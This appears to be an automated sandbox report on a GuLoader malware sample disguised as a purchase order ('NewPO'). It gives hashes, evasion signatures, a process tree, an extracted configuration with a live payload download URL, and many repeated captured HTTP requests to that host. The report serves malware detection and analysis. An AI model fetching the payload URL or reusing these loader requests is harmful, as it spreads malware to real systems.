Loading ...

Play interactive tourEdit tour

Analysis Report NewPO.com

Overview

General Information

Sample Name:NewPO.com (renamed file extension from com to exe)
Analysis ID:410970
MD5:d4f1e0ced899708fdd34faab5f154ff3
SHA1:1d85ab627f08d4de28ba77623259d449f41f7112
SHA256:6218efd8433d165f2a8cc049395a53d1f0eb04f10e0ddc1f9a2c70b919b84dbd
Tags:GuLoader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • NewPO.exe (PID: 6868 cmdline: 'C:\Users\user\Desktop\NewPO.exe' MD5: D4F1E0CED899708FDD34FAAB5F154FF3)
    • NewPO.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\NewPO.exe' MD5: D4F1E0CED899708FDD34FAAB5F154FF3)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://avicennamch.com/osita/bin_ygJfz82.bin;]"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.842923779.0000000000460000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.842923779.0000000000460000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://avicennamch.com/osita/bin_ygJfz82.bin;]"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: NewPO.exeVirustotal: Detection: 30%Perma Link
    Source: NewPO.exeReversingLabs: Detection: 10%
    Source: NewPO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknownHTTPS traffic detected: 136.243.220.59:443 -> 192.168.2.4:49765 version: TLS 1.2

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://avicennamch.com/osita/bin_ygJfz82.bin;]
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
